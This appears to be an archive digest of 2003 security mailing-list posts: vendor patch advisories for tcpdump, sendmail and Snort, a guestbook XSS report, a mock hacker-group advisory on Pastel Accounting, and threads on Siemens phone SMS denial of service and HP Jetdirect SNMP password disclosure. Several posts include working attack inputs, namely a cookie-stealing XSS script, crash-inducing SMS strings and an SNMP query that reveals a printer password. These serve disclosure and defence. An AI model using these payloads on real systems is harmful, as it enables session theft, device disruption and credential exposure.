at this adress :

http://[target]/livredor/index.php


The vulnerability is at the level of the interpretation of the titre,
Votre pseudo, Votre e-mail, Votre message fields.

Indeed, the insertion of a hostile code script in this field makes it
possible to a malicious user to carry out this script on the navigator
of the visitors.


The hostile code could be :

[script]alert(Cookie=+document.cookie)[/script]

(open a window with the cookie of the visitor.)

(replace [] by )


SOLUTIONS


No solution for the moment.


VENDOR STATUS


The vendor has reportedly been notified.


LINKS


http://www.security-corp.org/index.php?ink=4-15-1

Version Française :

http://www.security-corp.org/advisories/SCSA-008-FR.txt



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org

MDKSA-2003:027 - Updated tcpdump packages fix denial of service vulnerabilities

[Mandrake Linux Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



Mandrake Linux Security Update Advisory


Package name:   tcpdump
Advisory ID:MDKSA-2003:027
Date:   March 3rd, 2003

Affected versions:  8.1, 8.2, 9.0, Corporate Server 2.1,
Multi Network Firewall 8.2,
Single Network Firewall 7.2


Problem Description:

 A vulnerability was discovered by Andrew Griffiths and iDEFENSE Labs
 in the tcpdump program.  By sending a specially crafted network packet,
 an attacker is able to to cause tcpdump to enter an infinite loop.  In
 addition, the tcpdump developers found a potential infinite loop when
 tcpdump parses malformed BGP packets.  A buffer overflow was also
 discovered that can be exploited with certain malformed NFS packets.


References:
  
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0108


Updated Packages:
  
 Corporate Server 2.1:
 9df719dae2bffe49798156e87e875301  corporate/2.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 fa7813f3afb1df4b3c00b73a198a53db  
corporate/2.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 b32457602c61c0febcfc2e511373b517  corporate/2.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  corporate/2.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  corporate/2.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 8.1:
 785f18da90ecf009c38d8e9e01216756  8.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 512599ad54b47f70f54d722e7618ac45  8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 01ab2770370dd94c1946b476df624fb7  8.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 8.1/IA64:
 b6de1971e7852f1f1255dcf237af3cde  ia64/8.1/RPMS/libpcap0-0.7.2-1.1mdk.ia64.rpm
 de264fee1447af71141926878c93512e  ia64/8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.ia64.rpm
 7dc035a9f8e8c14d80b27517ea52597f  ia64/8.1/RPMS/tcpdump-3.7.2-1.1mdk.ia64.rpm
 2a5ba8809cc1b919e14eda315a6340b7  ia64/8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  ia64/8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 8.2:
 a86ae9c1f7d281382daf0a748b0cc192  8.2/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 24fe4d16b5e81d825fa6648a84997d84  8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 84e2ee00e25cb8e54d6efd98e20bd036  8.2/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 8.2/PPC:
 843c2d96494d413e96dee63c6eb013c8  ppc/8.2/RPMS/libpcap0-0.7.2-1.1mdk.ppc.rpm
 112ca43b4c261593d5667dc44c17c700  ppc/8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.ppc.rpm
 635d8576811efaee84d2c3608752669d  ppc/8.2/RPMS/tcpdump-3.7.2-1.1mdk.ppc.rpm
 2a5ba8809cc1b919e14eda315a6340b7  ppc/8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  ppc/8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 9.0:
 9df719dae2bffe49798156e87e875301  9.0/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 fa7813f3afb1df4b3c00b73a198a53db  9.0/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 b32457602c61c0febcfc2e511373b517  9.0/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  9.0/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  9.0/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Multi Network Firewall 8.2:
 a86ae9c1f7d281382daf0a748b0cc192  mnf8.2/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 24fe4d16b5e81d825fa6648a84997d84  mnf8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 84e2ee00e25cb8e54d6efd98e20bd036  mnf8.2/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  mnf8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  mnf8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Single Network Firewall 7.2:
 ea11a1e2673e0f2da584f08c83ac86a7  snf7.2/RPMS/libpcap-0.7.2-0.1mdk.i586.rpm
 972bdf436bdece0078fafcddcaee7c85  snf7.2/RPMS/libpcap-devel-0.7.2-0.1mdk.i586.rpm
 c96c4ae08580e72334da63a306168c41  snf7.2/RPMS/tcpdump-3.7.2-0.1mdk.i586.rpm
 971d86767061c5804ddb3cf7de5ab167  snf7.2/SRPMS/libpcap-0.7.2-0.1mdk.src.rpm
 9fb87d3952bf381e5ad552d16baea15b  snf7.2/SRPMS/tcpdump-3.7.2-0.1mdk.src.rpm


Bug IDs fixed (see https://qa.mandrakesoft.com for more information):


To upgrade automatically, use MandrakeUpdate.  The verification of md5
checksums and GPG signatures is performed automatically for you.

If 

Re: Cobalt RaQ server appliances

[Alan Coopersmith]

On Mon, Mar 03, 2003 at 06:26:20PM +0100, Florian Effenberger wrote:
 does anybody know a security contact at Sun, especially for the Cobalt RaQ
 server appliances?

[EMAIL PROTECTED] is the best place to contact for any and all Sun
security issues.

For sensitive information, their PGP key is available at
http://sunsolve.sun.com/pub-cgi/show.pl?target=security/sec


Alan Coopersmith  [EMAIL PROTECTED]
http://www.CSUA.Berkeley.EDU/~alanc/   aka: [EMAIL PROTECTED]
  Working for, but definitely not speaking for, Sun Microsystems, Inc.

[blaqhatz] - Pastel Accounting application security issues

[l33t guy]

See attached.
___
 http://www.webmail.co.za the South-African free email service

  NetWiseGurus.Com Portal - Your Own Internet Business Today!

-BEGIN PPP SIGNED MESSAGE-
Hash: SH1T

 
--blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz--


[EMAIL PROTECTED]@[EMAIL PROTECTED] ADVISORY [EMAIL PROTECTED]@[EMAIL PROTECTED]

blaqhatz advisory #1
date: third day of march, in the year of our lord
 two thousand and three (03/03/03)
why today? coz we love 303, oh! oh! oh! 
http://www.only4jewz.net/efil4zaggin/blaqhatz.advisory.20030303

blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-b
l  l
a  ,-.||  || //\\   /|||\  ||  ||  //\\ || |/  a
q /`-'\   ||   )) ||//  \\ ||   || ||  || //  \\  ||  //   q
|  .-/ \-,  ||/\ ||   || || /\  || //|
b (  `.___.'  )   ||   )) ||||  || ||   || ||  || ||  ||  ||// b
l  `. _ .'||  | ||  ||  \|||\\ ||  || ||  ||  ||   /|  l
a\\a 
q-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq



PRODUCT: PASTEL ACCOUNTING v6.0-6.12 (confirmed)
 earlier versions (suspected)


1. BACKGROUND

Pastel Accounting is an accounting package widely used by small business entities in 
countries in Africa, Europe, the Middle and Far East and Australasia. The Pastel 
product includes a facility for secure access to specific modules within the product.

Further information is available @ http://www.pastel.com


2. PROBLEM DESCRIPTION

The security system and application controls used by the Pastel product are broken.

All user and security information is stored with the file ACCUSER.DAT within the 
chosen client folder. No data is encrypted with any information within this file, nor 
is any version/validity checking done against this file.

As such, it is possible to replace the ACCUSER.DAT file with one from a different set 
of accounts, with known usernames and passwords, access and modify the data stored 
within a specific set of accounts and then restore the original file, thus providing 
no concrete on by whom the files were modified.

In some contexts, it would even be possible to falsify records in an attempt to 
'frame' a particular user with changes.

Additionally, some preliminary testing on the accuser.dat file displayed an alarming 
correlation between certain sections of the file and the passwords chosen. For 
example, given a group of users with chosen passwords , , 
, , and ABCDEFGH, the following strings were found in the file: 
, , , , and stuvwxyz.

3. IMPACT

Users may not rely on the application level controls implemented by the Pastel 
Accounting package.

As no reliance may be placed on applicaton level controls, auditors must audit around 
the application.


4. FIX

None as of yet. Vendor notified.

5. WHO ARE BLAQHATZ?
blaqhatz are:

pheer - pheerless
 - skankyvontrashbag - skankette - nyama_zinto -
 rod-boi - pheered - minibyte - whoot - pofmuis


 
--blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz--



   [EMAIL PROTECTED] blaqhatz [EMAIL PROTECTED]


 mailto:[EMAIL PROTECTED]

telling us who and what you are and with a good reason as to why you think you're leet 
enough to join blaqhatz

  Why should I join?

1. Everyone else thinks blaqhatz 0wn.
2. blaqhatz have been interviewed by more international legal authorities, seen the 
inside of more networks and more telco's, been on more television shows, been asked to 
assist more national intelligence agencies and skewled more people than any other 
group. **blaqhatz are *the* authority on modern information security** 3. We're nice 
people. 4. You can get  sekret, blaqhatz warez, for free, just for applying. 5. You 
value security and 0day. You believe in freedom of information. You believe in helping 
others help themselves. blaqhatz will help you act to make your beliefs a reality. 6. 
We're only accepting new member applications until the 9th of the 3rd, 2000  3, on a 
first come, first served basis. All members will need to be approved by the elite 
blaqhatz board.

Big ups, shout outs and serious ruspek go to:
~el8, BoW, #havok, phrack.org, kouriers 4 christ, #hack krew, oldskewl efnet 
#phreakGER, effkay, arclight, maelstrom, ganja_man, scavenger, mindbinder, raw liquid, 
tonedef, y0y0y0 and c0.

r0qin' 1t iN [EMAIL PROTECTED

Sygate Security Bulletin SS20030221-0001

[Elisha Riedlinger]

On 2/21/2003 Sygate posted a Security Response to vuln-dev in response to an
advisory posted by Oliver Lavery (xenophi1e) oliver.lavery at sympatico dot
com.

When first responding to the advisory, it was believed that the
vulnerability was reporting that the Sygate Personal Firewall process itself
was vulnerable to evasion through the use of CreateRemoteThread(). Sygate
Security Bulletin SS20030221-0001 described protections that are in place to
prevent this type of evasion in the Sygate Personal Firewall Process itself.
After re-examining the vulnerability report and working with the reporter of
this vulnerability, Oliver Lavery, it was determined that the report
discussed the insertion of code into the address space of other
applications. 

The vulnerability advisory highlights the issue that a firewall restricting
network access on a per-application basis does not protect against many
types of application behavior, particularly those relating to how the
application interacts with the operating system.  Sygate Personal Firewall
determines which applications are authorized to send and receive traffic
based on MD5 hashes (also called fingerprints) of the executables, the .DLLs
used by the application and the associated firewall rules. If a malicious
program executes code within the address space of an authorized application,
that traffic will be allowed by the personal firewall.

The scope of the filtering technology within Sygate Personal Firewall does
not include monitoring the address space of a given process.  The
restriction of system and API calls in third-party applications is currently
outside of the scope of the network-based functionality of Sygate Personal
Firewall.

Sygate Personal Firewall employs a variety of technologies to protect a
computer, including trojan and network intrusion prevention to provide
several layers of network-based protection.  Sygate is developing new
technologies and will continue to work towards providing the most
comprehensive security solutions for our customers.

Elisha Riedlinger
Product Manager
Sygate Technologies, Inc.

SuSE Security Announcement: sendmail (SuSE-SA:2003:013)

[Roman Drahtmueller]

-BEGIN PGP SIGNED MESSAGE-

__

SuSE Security Announcement

Package:sendmail, sendmail-tls
Announcement-ID:SuSE-SA:2003:013
Date:   Monday, March 3rd 2003, 18:10 MET
Affected products:  7.1, 7.2, 7.3, 8.0, 8.1
SuSE Linux Database Server,
SuSE Linux Enterprise Server 7, 8
SuSE Linux Firewall on CD/Admin host
SuSE Linux Connectivity Server
SuSE Linux Office Server
Vulnerability Type: local privilege escalation
Severity (1-10):7
SuSE default package:   yes (until SuSE Linux 8.0 and SLES7)
Cross References:   http://www.cert.org/advisories/CA-2003-07.html

Content of this advisory:
1) security vulnerability resolved: sendmail
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
- vnc
- w3m
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

sendmail is the most widely used mail transport agent (MTA) in the
internet. A remotely exploitable buffer overflow has been found in all
versions of sendmail that come with SuSE products. These versions include
sendmail-8.11 and sendmail-8.12 releases. sendmail is the MTA subsystem
that is installed by default on all SuSE products up to and including
SuSE Linux 8.0 and the SuSE Linux Enterprise Server 7.

The vulnerability is triggered by an email message sent through the
sendmail MTA subsystem. In that respect, it is different from commonly
known bugs that occur in the context of an open TCP connection. By
consequence, the vulnerability also exists if email messages get forwarded
over a relay that itself does not run a vulnerable MTA. This specific
detail and the wide distribution of sendmail in the internet causes this
vulnerability to be considered an error of major severity.

The buffer overflow happens on the heap and is known to be exploitable.
As of the writing of this announcement, there is no exploit known to exist
in the public. Since there is no known workaround for this vulnerability
other than using a different MTA, it is strongly recommended to install
the update packages as offered at the locations as listed below.

We would like to express our gratitude to Eric Allman for notifying
SuSE Security of the problem. The vulnerability was discovered by
ISS Internet Security Systems, inc.

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command rpm -Fhv file.rpm to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.

SPECIAL INSTALL INSTRUCTIONS:
==
After performing the update, it is necessary to restart all running
instances of sendmail using the command rcsendmail restart as root.



Intel i386 Platform:

SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-91.i586.rpm
  0f3d981ad8e9be64bc70aff474ce303c

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-devel-8.12.6-91.i586.rpm
  afe98a29de75ecd362fad5b02a922856
patch rpm(s):

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-91.i586.patch.rpm
  ebd8f188748812aff2830b23de6f34b3

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-devel-8.12.6-91.i586.patch.rpm
  09ff6834c369051d165d78f01a44d684
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/sendmail-8.12.6-91.src.rpm
  50e471df3a90ce4b54b2c5ca3fbc081e

SuSE-8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-72.i386.rpm
  09e0a8ed5b189c7c819d3d38f74a07e1
ftp://ftp.suse.com/pub/suse/i386/update/8.0/d4/sendmail-devel-8.12.3-72.i386.rpm
  72a8c31090299df6b7bd52ea38c31c2b
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-72.i386.patch.rpm
  905b39525ecd0506892b442a204b7aa3

ftp://ftp.suse.com/pub/suse/i386/update/8.0/d4/sendmail-devel-8.12.3-72.i386.patch.rpm
  a03e4a221c1fb8f2387dc133ada9e604
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sendmail-8.12.3-72.src.rpm
  6e3106de72c4605d379dc2133adba97b

SuSE-7.3:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/sendmail-8.11.6-162.i386.rpm

Re: Terminal Emulator Security Issues

[Michael Jennings]

On Monday, 03 March 2003, at 17:43:28 (-),
Kenn Humborg wrote:

 What about the CSI character, code 155 (128+27), which DEC terminals
 (from at least vt220) interpret as a shorthand for ESC [?

Eterm is a vt102 emulator, not a vt220 emulator.  It does not support
the 8-bit version of the CSI.  You can test this using:

  echo -e \23321t

You'll get that exact same string in reponse.

It may be supported at some point in the future, however, in which
case it would be considered a control character just like any other.

Michael

-- 
Michael Jennings (a.k.a. KainX)  http://www.kainx.org/  [EMAIL PROTECTED]
n + 1, Inc., http://www.nplus1.net/   Author, Eterm (www.eterm.org)
---
 Three six nine, the goose drank wine; the monkey chewed tobacco on
  the street car line.  The line broke, the monkey got choked, and
  they all went to heaven in a little row boat.  -- Nursery Rhyme

Siemens *35 and 45 series phones SMS Danial of Service

[subj subj]

Information:

The name of vulnerability: Siemens *35-45 DoS SMS Lag
 To vulnerability are subject: All versions siemens *35 and *45.
Official site: www.siemens-mobile.com
Kind of vulnerability: Refusal in Service (Denial of Service).
Type of vulnerability: Removed / local.
   Author: subj ([EMAIL PROTECTED])
 Date: 02.03.2003
 Site: www.dwcgr0up.com

Description of vulnerability:

 There is a local and remote vulnerability and
 Siemens *35 and *45 series phones.

 A message of the form %String, where String is on of the
 languages from the phone language selection menu, will
 completely disable *35 series phones and result
 in a 2 minute read delay on *45 series phones. Note that
 the first letter of language should be capitalized and
 the quotation marks should be present in the message.

The phone will try to read the message and then after 2 minutes
 return to the main menu. This happens every time the message is sent.
 After 10-15 messages the battery (NiMH) gets empty.
 
There is a local vulnerability of the same kind. A message of the
 form %some_word, where some_word is any lower case letter
 sequence will result in the same effects described above.

Vulnerability exploiting:

 (for remote): 
 We send on phone - victim the message:
   %Deutsch
 Or
   %Polski %Magyar %English %Deutsch
 (for local):
   testedersecurity

Thanks:
 DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp
 l0bster, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, dron 
(Ivanov Andrey)

RE: New HP Jetdirect SNMP password vulnerability when using Web JetAdmin

[[EMAIL PROTECTED]]

Sven,

I have been doing some research on the same issue, and it appears that 
some of the new firmware versions from HP actually fix this 
vulnerability by replacing the web server with a newer version that 
doesn't rely on client-side java to verify the password.

The issue at hand stems from the fact that the web server in older 
firmware versions (and some of the newer firmware versions) relied on 
client-side java to validate the administrator login.  This 
implementation did not encrypt and send the password to the web server 
to validate, but retrieved the password through snmp (read: plaintext) 
from the printer and validated the login on the client side.

As far as the fixes go, neither of the fixes that you outlined will 
remedy the situation:
1.  If you set the snmp community string to anything other than the 
default, 'internal' (the default for the JetAdmin Web Server) will still 
work.  The snmp community string of 'internal' is, as far as I have been 
able to tell, unremovable.  Once the snmp community strings have been 
set to whatever non-default string you want, 'internal' still seems to 
work.
2.  If you do not set a password on the JetAdmin Web Server, anyone can 
change the settings without authentication.

The best solution in this case is to disable the JetAdmin Web Server (if 
you cannot upgrade the firmware to include the Web Server that isn't 
written with client-side java) by typing 'ews-config: 0' at the telnet 
prompt.  Once this is done, the password can still be retrieved through 
the snmp object you mentioned, however no access will be granted (make 
sure your telnet password is different).  If you upgrade the printer 
firmware, an easy check to see if the new version is vulnerable is to 
access the web server: if you see the old, mostly-blue colored page, 
you're still vulnerable.  The new web server will still reply to the 
snmp request, but from what I've seen, it's always null (all 0x00, 0x00,...)

One more side note:  in your example, the raw ascii string is actually 
'ABCDUV'  :)

Have you talked to HP about this?

Geoff

-Original Message-
From: Sven Pechler [mailto:[EMAIL PROTECTED]
Sent: Monday, March 03, 2003 9:26 AM
To: [EMAIL PROTECTED]
Subject: New HP Jetdirect SNMP password vulnerability when using Web
JetAdmin


Hello,

During an analysis of some HP Jetdirect cards I discovered a security
issue that could lead to full access to a networked printer.
It looks like the vulnerability described in
http://www.securityfocus.com/bid/5331, but the OID is different and you
can only obtain one specific password.
It is also different from the password vulnerability described in
http://www.securityfocus.com/bid/3132
It applies to the following situation:

- Any operating system

-HP Jetdirect cards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A),
JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A)
and older.
-The Jetdirect card is being managed from HP Web Jetadmin.

-A Web Jetadmin device password had been set on the JetDirect card.
(This password must be set from Web Jetadmin and has nothing to do with
the Telnet password or the SNMP Set community name)
In the above situation the Web Jetadmin device password is readable as
plain ASCII tekst from the JetDirect card using SNMP.
How to check your printers for this vulnerability:

Use an SNMP toolkit to read the following OID from your printer:
.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-
printer.generalDeviceStatus.gdPasswords
(In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)
An example on a Windows machine, using SNMPUTIL from the Windows Resource
kit:
C:\snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
Value= String
0x410x420x430x440x550x560x3d0x310x300x380
x3b0x000x000x000x00 ..etc...
The resulting string reads in ASCII: ABCDEF=108;
The Web Jetadmin device password is the word before the '=' sign, in this
case: ABCDEF
How to protect your printer:

1.  Keep the Web Jetadmin device password EMPTY (don't do this on
newer cards than the ones mentioned above)
2.  Define a 'Set community name'  instead
Additional means of protection (does not address the SNMP vulnerability):
3.  Define a telnet password (do not keep it empty)
4.  Create an 'allow list' from the Telnet console to restrict access
from defined IP-addresses
Sven Pechler
University of Technology Eindhoven
Faculty of Technology Management

Re: Siemens *35 and 45 series phones SMS Danial of Service

[Jan Niehusmann]

On Mon, Mar 03, 2003 at 01:06:43AM -, subj subj wrote:
  To vulnerability are subject: All versions siemens *35 and *45.
[...]
  languages from the phone language selection menu, will
  completely disable *35 series phones and result
  in a 2 minute read delay on *45 series phones. Note that

Please note that this vulnerability isn't as serious as you describe it.
At least on my S45, I am able to interrupt this 2 minute delay at any
time by pressing the 'hang up' key (but I have to press it for about half a
second instead of just hitting it), the message can be read by using
'edit message' instead of 'read message', and it can be deleted without
problems.

So while this obviously is a bug, it can hardly be called a DoS.

Jan



pgp0.pgp
Description: PGP signature

Re: Security responsible at AOL

[Blud Clot]

A few months ago I submitted a vulnerability about AIM through the appropriate form on 
their website and to this day I haven't received a response. My advice would be to not 
bother because they clearly don't care at all.

-BludClot

- Original Message -
From: Michael Schwartzkopff [EMAIL PROTECTED]
Date: Sun, 2 Mar 2003 11:58:31 +0100
To: [EMAIL PROTECTED]
Subject: Security responsible at AOL

 Hi,
 
 I tried for a long time to contact a security responsible at AOL. I had no 
 chance with the telephone or via web. Is here anybody to tell me whom to 
 contact at AOL. Thanks.
 
 -- 
 Dr. Michael Schwartzkopff
 MultiNET Services GmbH
 Bretonischer Ring 7
 85630 Grasbrunn
 
 Tel: (089) 456 911 50
 Fax: (089) 456 911 21
 mob: (0174) 343 28 75

-- 

Get your own Hello Kitty email @ www.sanriotown.com

Powered by Outblaze

[CLA-2003:571] Conectiva Linux Security Announcement - sendmail

[secure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --

PACKAGE   : sendmail
SUMMARY   : Remote vulnerability
DATE  : 2003-03-03 19:30:00
ID: CLA-2003:571
RELEVANT
RELEASES  : 6.0, 7.0, 8

- -

DESCRIPTION
 Sendmail[1] is a widely used Mail Transfer Agent (MTA).
 
 Researchers at ISS[2] discovered and published[3] a remote
 vulnerability[4][5] in sendmail that could be used by an attacker to
 execute arbitrary code as root.
 
 This vulnerability can be exploited by creating and sending to a
 vulnerable sendmail server a carefully crafted email message. This
 message will trigger the vulnerability and arbitrary commands can be
 executed with administrative privileges.
 
 Please note that non-vulnerable mail servers can be used to pass such
 messages along so that, for example, even internal sendmail servers
 could be reached.
 
 Starting with Conectiva Linux 7.0, sendmail is no longer the default
 mail server and has been replaced with Postfix. But sendmail is still
 shipped in all Conectiva Linux versions.
 
 As with many other services, the email service, even if installed, is
 not started by default in Conectiva Linux.
 
 The Common Vulnerabilities and Exposures (CVE) project has assigned
 the name CAN-2002-1337[7] to this issue.


SOLUTION
 All sendmail users should upgrade their packages immediately. After
 the upgrade, the sendmail service will be automatically restarted if
 it was already running.
 
 
 REFERENCES
 1.http://www.sendmail.org/
 2.http://www.iss.net/
 3.http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950
 4.http://www.cert.org/advisories/CA-2003-07.html
 5.http://www.kb.cert.org/vuls/id/398025
 6.http://www.sendmail.com/security/
 7.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1337


UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_3cl.i386.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform 
 upgrades of RPM packages:

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions reagarding the use of apt and upgrade examples 
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- -
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
- -
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- -
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+Y+Nh42jd0JmAcZARAj6TAKDkgvTGscDsT95XBbE/yEO7jjOO9gCgrglI
s7NfdorrA+FnQm0Xy67kRSA=
=ZySZ
-END PGP SIGNATURE-

[Snort-2003-001] Buffer overflow in Snort RPC preprocessor (fwd)

[Dave Ahmad]

David Mirza Ahmad
Symantec

sabbe dhamma anatta

0x26005712
8D 9A B1 33 82 3D B3 D0 40 EB  AB F0 1E 67 C6 1A 26 00 57 12

-- Forwarded message --


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Snort Vulnerability Advisory [SNORT-2003-001]

Date: 2003-03-03

Affected Snort Versions:

Any version starting with version 1.8 to those before 2003-03-03 1PM/
US/Eastern including 1.9.0 and CVS HEAD (Snort 2.0beta)

Synopsis:

A buffer overflow has been found in the snort RPC normalization
routines by ISS X-Force.  This can cause snort to execute arbitrary
code embedded within sniffed network packets. This preprocessor is
enabled by default.

Snort 1.9.1 has been released to resolve this issue. For users using
CVS HEAD, a fix has been committed to the source tree.

Mitigation:

If you are in an environment that can not upgrade snort immediately,
comment out the line in your snort.conf that begins:

preprocessor rpc_decode

and replace it with

# preprocessor rpc_decode

Details:

When the rpc decoder normalizes fragmented RPC records, it incorrectly
checks the lengths of what is being normalized against the current
packet size.

The rpc decoder in Snort 1.9.1 and above contains new alert options
that can be used to help detect this attack

OptionDefault State

alert_fragments   INACTIVE
alert_large_fragments ACTIVE
alert_incomplete  ACTIVE
alert_multiple_requests   ACTIVE


The first option will alert on any rpc fragmented record it finds.
Large fragments will alert when the reassembled fragment record will
exceed the current packet length.  The incomplete record will alert
when there is a partial record found.  The alert_multiple_requests will
alert when we find more than one RPC request per packet ( or
reassembled packet ).

Download Locations:

Sourcefire has acquired additional bandwidth and hosting to aid users
wishing to upgrade their Snort implementation.  Binaries are currently
not available, this is a source release only at this time.  As new
binaries become available they will be added to the site.

Source code: http://www.snort.org/dl/snort-1.9.1.tar.gz
GPG Signatures: http://www.snort.org/dl/snort-1.9.1.tar.gz.asc

CVS HEAD (Snort 2.0beta)  has been fixed as well.


- --
Martin Roesch - Founder/CTO, Sourcefire Inc. - (410)290-1616
Sourcefire: Snort-based Enterprise Intrusion Detection Infrastructure
[EMAIL PROTECTED] - http://www.sourcefire.com
Snort: Open Source Network IDS - http://www.snort.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (Darwin)

iD8DBQE+Y+Rtqj0FAQQ3KOARAurPAJ9qzBQCzOG2xxcn2IBfuOlDMjPhJwCfdgiX
M+f1Ccdy03evjCtBT1rq6YQ=
=RhwD
